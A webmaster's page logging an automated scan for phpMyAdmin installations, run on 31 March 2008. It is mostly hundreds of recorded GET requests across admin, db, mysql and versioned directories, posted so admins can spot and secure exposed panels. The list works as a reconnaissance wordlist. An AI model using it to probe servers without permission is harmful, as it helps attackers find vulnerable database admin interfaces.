System: Web Server Attacks and Exploits
The number of attacks from rogue servers continues to increase. Previously I was recording details of individual attacks, but that's no longer feasable. Instead I've started a new page which will simply list the requested files and not discuss the payload or other attributes of the attack.
If your server has files matching any of the requests listed here you should be very attentive to updating and otherwise securing those applications.
PHP Database Exploit
The following attack came from an address at *.static.qsc.de between 03:59 and 04:00 GMT on 31 March 2008.
GET /PMA/main.php
GET /PMA/read_dump.phpmain.php
GET /PMA2005/main.php
GET /PMA2006/main.php
GET /admin/PMA2005/main.php
GET /admin/PMA2006/main.php
GET /admin/db/main.php
GET /admin/main.php
GET /admin/myadmin/main.php
GET /admin/mysql-admin/main.php
GET /admin/mysql/main.php
GET /admin/mysqladmin/main.php
GET /admin/mysqlmanager/main.php
GET /admin/p/m/a/main.php
GET /admin/pMA/main.php
GET /admin/php-my-admin/main.php
GET /admin/php-myadmin/main.php
GET /admin/phpMyAdmin-2.2.3/main.php
GET /admin/phpMyAdmin-2.2.6/main.php
GET /admin/phpMyAdmin-2.5.1/main.php
GET /admin/phpMyAdmin-2.5.4/main.php
GET /admin/phpMyAdmin-2.5.5-pl1/main.php
GET /admin/phpMyAdmin-2.5.5-rc1/main.php
GET /admin/phpMyAdmin-2.5.5-rc2/main.php
GET /admin/phpMyAdmin-2.5.5/main.php
GET /admin/phpMyAdmin-2.5.6-rc1/main.php
GET /admin/phpMyAdmin-2.5.6-rc2/main.php
GET /admin/phpMyAdmin-2.5.6/main.php
GET /admin/phpMyAdmin-2.5.7-pl1/main.php
GET /admin/phpMyAdmin-2.5.7/main.php
GET /admin/phpMyAdmin-2.6.0-alpha/main.php
GET /admin/phpMyAdmin-2.6.0-alpha2/main.php
GET /admin/phpMyAdmin-2.6.0-beta1/main.php
GET /admin/phpMyAdmin-2.6.0-beta2/main.php
GET /admin/phpMyAdmin-2.6.0-pl1/main.php
GET /admin/phpMyAdmin-2.6.0-pl2/main.php
GET /admin/phpMyAdmin-2.6.0-pl3/main.php
GET /admin/phpMyAdmin-2.6.0-rc1/main.php
GET /admin/phpMyAdmin-2.6.0-rc2/main.php
GET /admin/phpMyAdmin-2.6.0-rc3/main.php
GET /admin/phpMyAdmin-2.6.0/main.php
GET /admin/phpMyAdmin-2.6.1-pl1/main.php
GET /admin/phpMyAdmin-2.6.1-pl2/main.php
GET /admin/phpMyAdmin-2.6.1-pl3/main.php
GET /admin/phpMyAdmin-2.6.1-rc1/main.php
GET /admin/phpMyAdmin-2.6.1-rc2/main.php
GET /admin/phpMyAdmin-2.6.1/main.php
GET /admin/phpMyAdmin-2.6.2-beta1/main.php
GET /admin/phpMyAdmin-2.6.2-pl1/main.php
GET /admin/phpMyAdmin-2.6.2-rc1/main.php
GET /admin/phpMyAdmin-2.6.2/main.php
GET /admin/phpMyAdmin-2.6.3-pl1/main.php
GET /admin/phpMyAdmin-2.6.3-rc1/main.php
GET /admin/phpMyAdmin-2.6.3/main.php
GET /admin/phpMyAdmin-2.6.4-pl1/main.php
GET /admin/phpMyAdmin-2.6.4-pl2/main.php
GET /admin/phpMyAdmin-2.6.4-pl3/main.php
GET /admin/phpMyAdmin-2.6.4-pl4/main.php
GET /admin/phpMyAdmin-2.6.4-rc1/main.php
GET /admin/phpMyAdmin-2.6.4/main.php
GET /admin/phpMyAdmin-2.7.0-beta1/main.php
GET /admin/phpMyAdmin-2.7.0-pl1/main.php
GET /admin/phpMyAdmin-2.7.0-pl2/main.php
GET /admin/phpMyAdmin-2.7.0-rc1/main.php
GET /admin/phpMyAdmin-2.7.0/main.php
GET /admin/phpMyAdmin-2.8.0-beta1/main.php
GET /admin/phpMyAdmin-2.8.0-rc1/main.php
GET /admin/phpMyAdmin-2.8.0-rc2/main.php
GET /admin/phpMyAdmin-2.8.0.1/main.php
GET /admin/phpMyAdmin-2.8.0.2/main.php
GET /admin/phpMyAdmin-2.8.0.3/main.php
GET /admin/phpMyAdmin-2.8.0.4/main.php
GET /admin/phpMyAdmin-2.8.0/main.php
GET /admin/phpMyAdmin-2.8.1-rc1/main.php
GET /admin/phpMyAdmin-2.8.1/main.php
GET /admin/phpMyAdmin-2.8.2/main.php
GET /admin/phpMyAdmin-2/main.php
GET /admin/phpMyAdmin/main.php
GET /admin/phpMyAdmin2/main.php
GET /admin/phpmanager/main.php
GET /admin/phpmy-admin/main.php
GET /admin/phpmyadmin/main.php
GET /admin/phpmyadmin/read_dump.phpmain.php
GET /admin/phpmyadmin2/main.php
GET /admin/pma/read_dump.phpmain.php
GET /admin/pma2005/main.php
GET /admin/pma2006/main.php
GET /admin/read_dump.phpmain.php
GET /admin/sqladmin/main.php
GET /admin/sqlmanager/main.php
GET /admin/sqlweb/main.php
GET /admin/sysadmin/main.php
GET /admin/web/main.php
GET /admin/webadmin/main.php
GET /admin/webdb/main.php
GET /admin/websql/main.php
GET /administrator/admin/main.php
GET /administrator/db/main.php
GET /administrator/dbadmin/main.php
GET /administrator/main.php
GET /administrator/myadmin/main.php
GET /administrator/mysql-admin/main.php
GET /administrator/mysql/main.php
GET /administrator/mysqladmin/main.php
GET /administrator/mysqlmanager/main.php
GET /administrator/p/m/a/main.php
GET /administrator/pMA/main.php
GET /administrator/pMA2005/main.php
GET /administrator/pMA2006/main.php
GET /administrator/php-my-admin/main.php
GET /administrator/php-myadmin/main.php
GET /administrator/phpMyAdmin-2.2.3/main.php
GET /administrator/phpMyAdmin-2.2.6/main.php
GET /administrator/phpMyAdmin-2.5.1/main.php
GET /administrator/phpMyAdmin-2.5.4/main.php
GET /administrator/phpMyAdmin-2.5.5-pl1/main.php
GET /administrator/phpMyAdmin-2.5.5-rc1/main.php
GET /administrator/phpMyAdmin-2.5.5-rc2/main.php
GET /administrator/phpMyAdmin-2.5.5/main.php
GET /administrator/phpMyAdmin-2.5.6-rc1/main.php
GET /administrator/phpMyAdmin-2.5.6-rc2/main.php
GET /administrator/phpMyAdmin-2.5.6/main.php
GET /administrator/phpMyAdmin-2.5.7-pl1/main.php
GET /administrator/phpMyAdmin-2.5.7/main.php
GET /administrator/phpMyAdmin-2.6.0-alpha/main.php
GET /administrator/phpMyAdmin-2.6.0-alpha2/main.php
GET /administrator/phpMyAdmin-2.6.0-beta1/main.php
GET /administrator/phpMyAdmin-2.6.0-beta2/main.php
GET /administrator/phpMyAdmin-2.6.0-pl1/main.php
GET /administrator/phpMyAdmin-2.6.0-pl2/main.php
GET /administrator/phpMyAdmin-2.6.0-pl3/main.php
GET /administrator/phpMyAdmin-2.6.0-rc1/main.php
GET /administrator/phpMyAdmin-2.6.0-rc2/main.php
GET /administrator/phpMyAdmin-2.6.0-rc3/main.php
GET /administrator/phpMyAdmin-2.6.0/main.php
GET /administrator/phpMyAdmin-2.6.1-pl1/main.php
GET /administrator/phpMyAdmin-2.6.1-pl2/main.php
GET /administrator/phpMyAdmin-2.6.1-pl3/main.php
GET /administrator/phpMyAdmin-2.6.1-rc1/main.php
GET /administrator/phpMyAdmin-2.6.1-rc2/main.php
GET /administrator/phpMyAdmin-2.6.1/main.php
GET /administrator/phpMyAdmin-2.6.2-beta1/main.php
GET /administrator/phpMyAdmin-2.6.2-pl1/main.php
GET /administrator/phpMyAdmin-2.6.2-rc1/main.php
GET /administrator/phpMyAdmin-2.6.2/main.php
GET /administrator/phpMyAdmin-2.6.3-pl1/main.php
GET /administrator/phpMyAdmin-2.6.3-rc1/main.php
GET /administrator/phpMyAdmin-2.6.3/main.php
GET /administrator/phpMyAdmin-2.6.4-pl1/main.php
GET /administrator/phpMyAdmin-2.6.4-pl2/main.php
GET /administrator/phpMyAdmin-2.6.4-pl3/main.php
GET /administrator/phpMyAdmin-2.6.4-pl4/main.php
GET /administrator/phpMyAdmin-2.6.4-rc1/main.php
GET /administrator/phpMyAdmin-2.6.4/main.php
GET /administrator/phpMyAdmin-2.7.0-beta1/main.php
GET /administrator/phpMyAdmin-2.7.0-pl1/main.php
GET /administrator/phpMyAdmin-2.7.0-pl2/main.php
GET /administrator/phpMyAdmin-2.7.0-rc1/main.php
GET /administrator/phpMyAdmin-2.7.0/main.php
GET /administrator/phpMyAdmin-2.8.0-beta1/main.php
GET /administrator/phpMyAdmin-2.8.0-rc1/main.php
GET /administrator/phpMyAdmin-2.8.0-rc2/main.php
GET /administrator/phpMyAdmin-2.8.0.1/main.php
GET /administrator/phpMyAdmin-2.8.0.2/main.php
GET /administrator/phpMyAdmin-2.8.0.3/main.php
GET /administrator/phpMyAdmin-2.8.0.4/main.php
GET /administrator/phpMyAdmin-2.8.0/main.php
GET /administrator/phpMyAdmin-2.8.1-rc1/main.php
GET /administrator/phpMyAdmin-2.8.1/main.php
GET /administrator/phpMyAdmin-2.8.2/main.php
GET /administrator/phpMyAdmin-2/main.php
GET /administrator/phpMyAdmin/main.php
GET /administrator/phpMyAdmin2/main.php
GET /administrator/phpmanager/main.php
GET /administrator/phpmy-admin/main.php
GET /administrator/phpmyadmin/main.php
GET /administrator/phpmyadmin2/main.php
GET /administrator/pma2005/main.php
GET /administrator/pma2006/main.php
GET /administrator/sqlmanager/main.php
GET /administrator/sqlweb/main.php
GET /administrator/web/main.php
GET /administrator/webadmin/main.php
GET /administrator/webdb/main.php
GET /administrator/websql/main.php
GET /database/admin/main.php
GET /database/database-admin/main.php
GET /database/database/main.php
GET /database/databaseadmin/main.php
GET /database/databasemanager/main.php
GET /database/databaseweb/main.php
GET /database/main.php
GET /database/myadmin/main.php
GET /database/p/m/a/main.php
GET /database/pMA/main.php
GET /database/pMA2005/main.php
GET /database/pMA2006/main.php
GET /database/php-my-admin/main.php
GET /database/php-myadmin/main.php
GET /database/phpMyAdmin-2.2.3/main.php
GET /database/phpMyAdmin-2.2.6/main.php
GET /database/phpMyAdmin-2.5.1/main.php
GET /database/phpMyAdmin-2.5.4/main.php
GET /database/phpMyAdmin-2.5.5-pl1/main.php
GET /database/phpMyAdmin-2.5.5-rc1/main.php
GET /database/phpMyAdmin-2.5.5-rc2/main.php
GET /database/phpMyAdmin-2.5.5/main.php
GET /database/phpMyAdmin-2.5.6-rc1/main.php
GET /database/phpMyAdmin-2.5.6-rc2/main.php
GET /database/phpMyAdmin-2.5.6/main.php
GET /database/phpMyAdmin-2.5.7-pl1/main.php
GET /database/phpMyAdmin-2.5.7/main.php
GET /database/phpMyAdmin-2.6.0-alpha/main.php
GET /database/phpMyAdmin-2.6.0-alpha2/main.php
GET /database/phpMyAdmin-2.6.0-beta1/main.php
GET /database/phpMyAdmin-2.6.0-beta2/main.php
GET /database/phpMyAdmin-2.6.0-pl1/main.php
GET /database/phpMyAdmin-2.6.0-pl2/main.php
GET /database/phpMyAdmin-2.6.0-pl3/main.php
GET /database/phpMyAdmin-2.6.0-rc1/main.php
GET /database/phpMyAdmin-2.6.0-rc2/main.php
GET /database/phpMyAdmin-2.6.0-rc3/main.php
GET /database/phpMyAdmin-2.6.0/main.php
GET /database/phpMyAdmin-2.6.1-pl1/main.php
GET /database/phpMyAdmin-2.6.1-pl2/main.php
GET /database/phpMyAdmin-2.6.1-pl3/main.php
GET /database/phpMyAdmin-2.6.1-rc1/main.php
GET /database/phpMyAdmin-2.6.1-rc2/main.php
GET /database/phpMyAdmin-2.6.1/main.php
GET /database/phpMyAdmin-2.6.2-beta1/main.php
GET /database/phpMyAdmin-2.6.2-pl1/main.php
GET /database/phpMyAdmin-2.6.2-rc1/main.php
GET /database/phpMyAdmin-2.6.2/main.php
GET /database/phpMyAdmin-2.6.3-pl1/main.php
GET /database/phpMyAdmin-2.6.3-rc1/main.php
GET /database/phpMyAdmin-2.6.3/main.php
GET /database/phpMyAdmin-2.6.4-pl1/main.php
GET /database/phpMyAdmin-2.6.4-pl2/main.php
GET /database/phpMyAdmin-2.6.4-pl3/main.php
GET /database/phpMyAdmin-2.6.4-pl4/main.php
GET /database/phpMyAdmin-2.6.4-rc1/main.php
GET /database/phpMyAdmin-2.6.4/main.php
GET /database/phpMyAdmin-2.7.0-beta1/main.php
GET /database/phpMyAdmin-2.7.0-pl1/main.php
GET /database/phpMyAdmin-2.7.0-pl2/main.php
GET /database/phpMyAdmin-2.7.0-rc1/main.php
GET /database/phpMyAdmin-2.7.0/main.php
GET /database/phpMyAdmin-2.8.0-beta1/main.php
GET /database/phpMyAdmin-2.8.0-rc1/main.php
GET /database/phpMyAdmin-2.8.0-rc2/main.php
GET /database/phpMyAdmin-2.8.0.1/main.php
GET /database/phpMyAdmin-2.8.0.2/main.php
GET /database/phpMyAdmin-2.8.0.3/main.php
GET /database/phpMyAdmin-2.8.0.4/main.php
GET /database/phpMyAdmin-2.8.0/main.php
GET /database/phpMyAdmin-2.8.1-rc1/main.php
GET /database/phpMyAdmin-2.8.1/main.php
GET /database/phpMyAdmin-2.8.2/main.php
GET /database/phpMyAdmin-2/main.php
GET /database/phpMyAdmin/main.php
GET /database/phpMyAdmin2/main.php
GET /database/phpmanager/main.php
GET /database/phpmy-admin/main.php
GET /database/phpmyadmin/main.php
GET /database/phpmyadmin2/main.php
GET /database/pma2005/main.php
GET /database/pma2006/main.php
GET /database/web/main.php
GET /database/webadmin/main.php
GET /database/webdb/main.php
GET /database/websql/main.php
GET /db/admin/main.php
GET /db/db-admin/main.php
GET /db/db/main.php
GET /db/dbadmin/main.php
GET /db/dbmanager/main.php
GET /db/dbweb/main.php
GET /db/main.php
GET /db/myadmin/main.php
GET /db/p/m/a/main.php
GET /db/pMA/main.php
GET /db/pMA2005/main.php
GET /db/pMA2006/main.php
GET /db/php-my-admin/main.php
GET /db/php-myadmin/main.php
GET /db/phpMyAdmin-2.2.3/main.php
GET /db/phpMyAdmin-2.2.6/main.php
GET /db/phpMyAdmin-2.5.1/main.php
GET /db/phpMyAdmin-2.5.4/main.php
GET /db/phpMyAdmin-2.5.5-pl1/main.php
GET /db/phpMyAdmin-2.5.5-rc1/main.php
GET /db/phpMyAdmin-2.5.5-rc2/main.php
GET /db/phpMyAdmin-2.5.5/main.php
GET /db/phpMyAdmin-2.5.6-rc1/main.php
GET /db/phpMyAdmin-2.5.6-rc2/main.php
GET /db/phpMyAdmin-2.5.6/main.php
GET /db/phpMyAdmin-2.5.7-pl1/main.php
GET /db/phpMyAdmin-2.5.7/main.php
GET /db/phpMyAdmin-2.6.0-alpha/main.php
GET /db/phpMyAdmin-2.6.0-alpha2/main.php
GET /db/phpMyAdmin-2.6.0-beta1/main.php
GET /db/phpMyAdmin-2.6.0-beta2/main.php
GET /db/phpMyAdmin-2.6.0-pl1/main.php
GET /db/phpMyAdmin-2.6.0-pl2/main.php
GET /db/phpMyAdmin-2.6.0-pl3/main.php
GET /db/phpMyAdmin-2.6.0-rc1/main.php
GET /db/phpMyAdmin-2.6.0-rc2/main.php
GET /db/phpMyAdmin-2.6.0-rc3/main.php
GET /db/phpMyAdmin-2.6.0/main.php
GET /db/phpMyAdmin-2.6.1-pl1/main.php
GET /db/phpMyAdmin-2.6.1-pl2/main.php
GET /db/phpMyAdmin-2.6.1-pl3/main.php
GET /db/phpMyAdmin-2.6.1-rc1/main.php
GET /db/phpMyAdmin-2.6.1-rc2/main.php
GET /db/phpMyAdmin-2.6.1/main.php
GET /db/phpMyAdmin-2.6.2-beta1/main.php
GET /db/phpMyAdmin-2.6.2-pl1/main.php
GET /db/phpMyAdmin-2.6.2-rc1/main.php
GET /db/phpMyAdmin-2.6.2/main.php
GET /db/phpMyAdmin-2.6.3-pl1/main.php
GET /db/phpMyAdmin-2.6.3-rc1/main.php
GET /db/phpMyAdmin-2.6.3/main.php
GET /db/phpMyAdmin-2.6.4-pl1/main.php
GET /db/phpMyAdmin-2.6.4-pl2/main.php
GET /db/phpMyAdmin-2.6.4-pl3/main.php
GET /db/phpMyAdmin-2.6.4-pl4/main.php
GET /db/phpMyAdmin-2.6.4-rc1/main.php
GET /db/phpMyAdmin-2.6.4/main.php
GET /db/phpMyAdmin-2.7.0-beta1/main.php
GET /db/phpMyAdmin-2.7.0-pl1/main.php
GET /db/phpMyAdmin-2.7.0-pl2/main.php
GET /db/phpMyAdmin-2.7.0-rc1/main.php
GET /db/phpMyAdmin-2.7.0/main.php
GET /db/phpMyAdmin-2.8.0-beta1/main.php
GET /db/phpMyAdmin-2.8.0-rc1/main.php
GET /db/phpMyAdmin-2.8.0-rc2/main.php
GET /db/phpMyAdmin-2.8.0.1/main.php
GET /db/phpMyAdmin-2.8.0.2/main.php
GET /db/phpMyAdmin-2.8.0.3/main.php
GET /db/phpMyAdmin-2.8.0.4/main.php
GET /db/phpMyAdmin-2.8.0/main.php
GET /db/phpMyAdmin-2.8.1-rc1/main.php
GET /db/phpMyAdmin-2.8.1/main.php
GET /db/phpMyAdmin-2.8.2/main.php
GET /db/phpMyAdmin-2/main.php
GET /db/phpMyAdmin/main.php
GET /db/phpMyAdmin2/main.php
GET /db/phpmanager/main.php
GET /db/phpmy-admin/main.php
GET /db/phpmyadmin/main.php
GET /db/phpmyadmin2/main.php
GET /db/pma2005/main.php
GET /db/pma2006/main.php
GET /db/read_dump.phpmain.php
GET /db/web/main.php
GET /db/webadmin/main.php
GET /db/webdb/main.php
GET /db/websql/main.php
GET /dbadmin/main.php
GET /dbadmin/read_dump.phpmain.php
GET /myadmin/main.php
GET /myadmin/read_dump.phpmain.php
GET /mysql-admin/main.php
GET /mysql/admin/main.php
GET /mysql/db/main.php
GET /mysql/dbadmin/main.php
GET /mysql/main.php
GET /mysql/myadmin/main.php
GET /mysql/mysql-admin/main.php
GET /mysql/mysql/main.php
GET /mysql/mysqladmin/main.php
GET /mysql/mysqlmanager/main.php
GET /mysql/p/m/a/main.php
GET /mysql/pMA/main.php
GET /mysql/pMA2005/main.php
GET /mysql/pMA2006/main.php
GET /mysql/php-my-admin/main.php
GET /mysql/php-myadmin/main.php
GET /mysql/phpMyAdmin-2.2.3/main.php
GET /mysql/phpMyAdmin-2.2.6/main.php
GET /mysql/phpMyAdmin-2.5.1/main.php
GET /mysql/phpMyAdmin-2.5.4/main.php
GET /mysql/phpMyAdmin-2.5.5-pl1/main.php
GET /mysql/phpMyAdmin-2.5.5-rc1/main.php
GET /mysql/phpMyAdmin-2.5.5-rc2/main.php
GET /mysql/phpMyAdmin-2.5.5/main.php
GET /mysql/phpMyAdmin-2.5.6-rc1/main.php
GET /mysql/phpMyAdmin-2.5.6-rc2/main.php
GET /mysql/phpMyAdmin-2.5.6/main.php
GET /mysql/phpMyAdmin-2.5.7-pl1/main.php
GET /mysql/phpMyAdmin-2.5.7/main.php
GET /mysql/phpMyAdmin-2.6.0-alpha/main.php
GET /mysql/phpMyAdmin-2.6.0-alpha2/main.php
GET /mysql/phpMyAdmin-2.6.0-beta1/main.php
GET /mysql/phpMyAdmin-2.6.0-beta2/main.php
GET /mysql/phpMyAdmin-2.6.0-pl1/main.php
GET /mysql/phpMyAdmin-2.6.0-pl2/main.php
GET /mysql/phpMyAdmin-2.6.0-pl3/main.php
GET /mysql/phpMyAdmin-2.6.0-rc1/main.php
GET /mysql/phpMyAdmin-2.6.0-rc2/main.php
GET /mysql/phpMyAdmin-2.6.0-rc3/main.php
GET /mysql/phpMyAdmin-2.6.0/main.php
GET /mysql/phpMyAdmin-2.6.1-pl1/main.php
GET /mysql/phpMyAdmin-2.6.1-pl2/main.php
GET /mysql/phpMyAdmin-2.6.1-pl3/main.php
GET /mysql/phpMyAdmin-2.6.1-rc1/main.php
GET /mysql/phpMyAdmin-2.6.1-rc2/main.php
GET /mysql/phpMyAdmin-2.6.1/main.php
GET /mysql/phpMyAdmin-2.6.2-beta1/main.php
GET /mysql/phpMyAdmin-2.6.2-pl1/main.php
GET /mysql/phpMyAdmin-2.6.2-rc1/main.php
GET /mysql/phpMyAdmin-2.6.2/main.php
GET /mysql/phpMyAdmin-2.6.3-pl1/main.php
GET /mysql/phpMyAdmin-2.6.3-rc1/main.php
GET /mysql/phpMyAdmin-2.6.3/main.php
GET /mysql/phpMyAdmin-2.6.4-pl1/main.php
GET /mysql/phpMyAdmin-2.6.4-pl2/main.php
GET /mysql/phpMyAdmin-2.6.4-pl3/main.php
GET /mysql/phpMyAdmin-2.6.4-pl4/main.php
GET /mysql/phpMyAdmin-2.6.4-rc1/main.php
GET /mysql/phpMyAdmin-2.6.4/main.php
GET /mysql/phpMyAdmin-2.7.0-beta1/main.php
GET /mysql/phpMyAdmin-2.7.0-pl1/main.php
GET /mysql/phpMyAdmin-2.7.0-pl2/main.php
GET /mysql/phpMyAdmin-2.7.0-rc1/main.php
GET /mysql/phpMyAdmin-2.7.0/main.php
GET /mysql/phpMyAdmin-2.8.0-beta1/main.php
GET /mysql/phpMyAdmin-2.8.0-rc1/main.php
GET /mysql/phpMyAdmin-2.8.0-rc2/main.php
GET /mysql/phpMyAdmin-2.8.0.1/main.php
GET /mysql/phpMyAdmin-2.8.0.2/main.php
GET /mysql/phpMyAdmin-2.8.0.3/main.php
GET /mysql/phpMyAdmin-2.8.0.4/main.php
GET /mysql/phpMyAdmin-2.8.0/main.php
GET /mysql/phpMyAdmin-2.8.1-rc1/main.php
GET /mysql/phpMyAdmin-2.8.1/main.php
GET /mysql/phpMyAdmin-2.8.2/main.php
GET /mysql/phpMyAdmin-2/main.php
GET /mysql/phpMyAdmin/main.php
GET /mysql/phpMyAdmin2/main.php
GET /mysql/phpmanager/main.php
GET /mysql/phpmy-admin/main.php
GET /mysql/phpmyadmin/main.php
GET /mysql/phpmyadmin2/main.php
GET /mysql/pma2005/main.php
GET /mysql/pma2006/main.php
GET /mysql/read_dump.phpmain.php
GET /mysql/sqlmanager/main.php
GET /mysql/sqlweb/main.php
GET /mysql/web/main.php
GET /mysql/webadmin/main.php
GET /mysql/webdb/main.php
GET /mysql/websql/main.php
GET /mysqladmin/main.php
GET /mysqladmin/read_dump.phpmain.php
GET /mysqlmanager/main.php
GET /p/m/a/main.php
GET /padmin/read_dump.phpmain.php
GET /php-my-admin/main.php
GET /php-myadmin/main.php
GET /phpMyAdmin
GET /phpMyAdmin-2.2.3/main.php
GET /phpMyAdmin-2.2.3/read_dump.phpmain.php
GET /phpMyAdmin-2.2.6/main.php
GET /phpMyAdmin-2.2.7-pl1/read_dump.phpmain.php
GET /phpMyAdmin-2.5.1/main.php
GET /phpMyAdmin-2.5.4/main.php
GET /phpMyAdmin-2.5.5-pl1/main.php
GET /phpMyAdmin-2.5.5-rc1/main.php
GET /phpMyAdmin-2.5.5-rc2/main.php
GET /phpMyAdmin-2.5.5/main.php
GET /phpMyAdmin-2.5.6-rc1/main.php
GET /phpMyAdmin-2.5.6-rc2/main.php
GET /phpMyAdmin-2.5.6/main.php
GET /phpMyAdmin-2.5.6/read_dump.phpmain.php
GET /phpMyAdmin-2.5.7-pl1/main.php
GET /phpMyAdmin-2.5.7-pl1/read_dump.phpmain.php
GET /phpMyAdmin-2.5.7/main.php
GET /phpMyAdmin-2.6.0-alpha/main.php
GET /phpMyAdmin-2.6.0-alpha2/main.php
GET /phpMyAdmin-2.6.0-beta1/main.php
GET /phpMyAdmin-2.6.0-beta2/main.php
GET /phpMyAdmin-2.6.0-pl1/main.php
GET /phpMyAdmin-2.6.0-pl2/main.php
GET /phpMyAdmin-2.6.0-pl3/main.php
GET /phpMyAdmin-2.6.0-pl3/read_dump.phpmain.php
GET /phpMyAdmin-2.6.0-rc1/main.php
GET /phpMyAdmin-2.6.0-rc2/main.php
GET /phpMyAdmin-2.6.0-rc3/main.php
GET /phpMyAdmin-2.6.0/main.php
GET /phpMyAdmin-2.6.0/read_dump.phpmain.php
GET /phpMyAdmin-2.6.1-pl1/main.php
GET /phpMyAdmin-2.6.1-pl2/main.php
GET /phpMyAdmin-2.6.1-pl3/main.php
GET /phpMyAdmin-2.6.1-pl3/read_dump.phpmain.php
GET /phpMyAdmin-2.6.1-rc1/main.php
GET /phpMyAdmin-2.6.1-rc2/main.php
GET /phpMyAdmin-2.6.1/main.php
GET /phpMyAdmin-2.6.2-beta1/main.php
GET /phpMyAdmin-2.6.2-pl1/main.php
GET /phpMyAdmin-2.6.2-rc1/main.php
GET /phpMyAdmin-2.6.2/main.php
GET /phpMyAdmin-2.6.3-pl1/main.php
GET /phpMyAdmin-2.6.3-pl1/read_dump.phpmain.php
GET /phpMyAdmin-2.6.3-rc1/main.php
GET /phpMyAdmin-2.6.3/main.php
GET /phpMyAdmin-2.6.4-pl1/main.php
GET /phpMyAdmin-2.6.4-pl2/main.php
GET /phpMyAdmin-2.6.4-pl3/main.php
GET /phpMyAdmin-2.6.4-pl4/main.php
GET /phpMyAdmin-2.6.4-rc1/main.php
GET /phpMyAdmin-2.6.4/main.php
GET /phpMyAdmin-2.6.4/read_dump.phpmain.php
GET /phpMyAdmin-2.7.0-beta1/main.php
GET /phpMyAdmin-2.7.0-pl1/main.php
GET /phpMyAdmin-2.7.0-pl2/main.php
GET /phpMyAdmin-2.7.0-rc1/main.php
GET /phpMyAdmin-2.7.0/main.php
GET /phpMyAdmin-2.8.0-beta1/main.php
GET /phpMyAdmin-2.8.0-rc1/main.php
GET /phpMyAdmin-2.8.0-rc2/main.php
GET /phpMyAdmin-2.8.0.1/main.php
GET /phpMyAdmin-2.8.0.2/main.php
GET /phpMyAdmin-2.8.0.3/main.php
GET /phpMyAdmin-2.8.0.4/main.php
GET /phpMyAdmin-2.8.0/main.php
GET /phpMyAdmin-2.8.1-rc1/main.php
GET /phpMyAdmin-2.8.1/main.php
GET /phpMyAdmin-2.8.2/main.php
GET /phpMyAdmin-2/main.php
GET /phpMyAdmin/main.php
GET /phpMyAdmin2/main.php
GET /phpadmin/read_dump.phpmain.php
GET /phpmanager/main.php
GET /phpmy-admin/main.php
GET /phpmyadmin/main.php
GET /phpmyadmin/read_dump.phpmain.php
GET /phpmyadmin1/read_dump.phpmain.php
GET /phpmyadmin2/main.php
GET /phpmyadmin2/read_dump.phpmain.php
GET /pma2005/main.php
GET /pma2006/main.php
GET /sql/admin/main.php
GET /sql/db/main.php
GET /sql/dbadmin/main.php
GET /sql/main.php
GET /sql/myadmin/main.php
GET /sql/p/m/a/main.php
GET /sql/pMA/main.php
GET /sql/pMA2005/main.php
GET /sql/pMA2006/main.php
GET /sql/php-my-admin/main.php
GET /sql/php-myadmin/main.php
GET /sql/phpMyAdmin-2.2.3/main.php
GET /sql/phpMyAdmin-2.2.6/main.php
GET /sql/phpMyAdmin-2.5.1/main.php
GET /sql/phpMyAdmin-2.5.4/main.php
GET /sql/phpMyAdmin-2.5.5-pl1/main.php
GET /sql/phpMyAdmin-2.5.5-rc1/main.php
GET /sql/phpMyAdmin-2.5.5-rc2/main.php
GET /sql/phpMyAdmin-2.5.5/main.php
GET /sql/phpMyAdmin-2.5.6-rc1/main.php
GET /sql/phpMyAdmin-2.5.6-rc2/main.php
GET /sql/phpMyAdmin-2.5.6/main.php
GET /sql/phpMyAdmin-2.5.7-pl1/main.php
GET /sql/phpMyAdmin-2.5.7/main.php
GET /sql/phpMyAdmin-2.6.0-alpha/main.php
GET /sql/phpMyAdmin-2.6.0-alpha2/main.php
GET /sql/phpMyAdmin-2.6.0-beta1/main.php
GET /sql/phpMyAdmin-2.6.0-beta2/main.php
GET /sql/phpMyAdmin-2.6.0-pl1/main.php
GET /sql/phpMyAdmin-2.6.0-pl2/main.php
GET /sql/phpMyAdmin-2.6.0-pl3/main.php
GET /sql/phpMyAdmin-2.6.0-rc1/main.php
GET /sql/phpMyAdmin-2.6.0-rc2/main.php
GET /sql/phpMyAdmin-2.6.0-rc3/main.php
GET /sql/phpMyAdmin-2.6.0/main.php
GET /sql/phpMyAdmin-2.6.1-pl1/main.php
GET /sql/phpMyAdmin-2.6.1-pl2/main.php
GET /sql/phpMyAdmin-2.6.1-pl3/main.php
GET /sql/phpMyAdmin-2.6.1-rc1/main.php
GET /sql/phpMyAdmin-2.6.1-rc2/main.php
GET /sql/phpMyAdmin-2.6.1/main.php
GET /sql/phpMyAdmin-2.6.2-beta1/main.php
GET /sql/phpMyAdmin-2.6.2-pl1/main.php
GET /sql/phpMyAdmin-2.6.2-rc1/main.php
GET /sql/phpMyAdmin-2.6.2/main.php
GET /sql/phpMyAdmin-2.6.3-pl1/main.php
GET /sql/phpMyAdmin-2.6.3-rc1/main.php
GET /sql/phpMyAdmin-2.6.3/main.php
GET /sql/phpMyAdmin-2.6.4-pl1/main.php
GET /sql/phpMyAdmin-2.6.4-pl2/main.php
GET /sql/phpMyAdmin-2.6.4-pl3/main.php
GET /sql/phpMyAdmin-2.6.4-pl4/main.php
GET /sql/phpMyAdmin-2.6.4-rc1/main.php
GET /sql/phpMyAdmin-2.6.4/main.php
GET /sql/phpMyAdmin-2.7.0-beta1/main.php
GET /sql/phpMyAdmin-2.7.0-pl1/main.php
GET /sql/phpMyAdmin-2.7.0-pl2/main.php
GET /sql/phpMyAdmin-2.7.0-rc1/main.php
GET /sql/phpMyAdmin-2.7.0/main.php
GET /sql/phpMyAdmin-2.8.0-beta1/main.php
GET /sql/phpMyAdmin-2.8.0-rc1/main.php
GET /sql/phpMyAdmin-2.8.0-rc2/main.php
GET /sql/phpMyAdmin-2.8.0.1/main.php
GET /sql/phpMyAdmin-2.8.0.2/main.php
GET /sql/phpMyAdmin-2.8.0.3/main.php
GET /sql/phpMyAdmin-2.8.0.4/main.php
GET /sql/phpMyAdmin-2.8.0/main.php
GET /sql/phpMyAdmin-2.8.1-rc1/main.php
GET /sql/phpMyAdmin-2.8.1/main.php
GET /sql/phpMyAdmin-2.8.2/main.php
GET /sql/phpMyAdmin-2/main.php
GET /sql/phpMyAdmin/main.php
GET /sql/phpMyAdmin2/main.php
GET /sql/phpmanager/main.php
GET /sql/phpmy-admin/main.php
GET /sql/phpmyadmin/main.php
GET /sql/phpmyadmin2/main.php
GET /sql/pma2005/main.php
GET /sql/pma2006/main.php
GET /sql/sql-admin/main.php
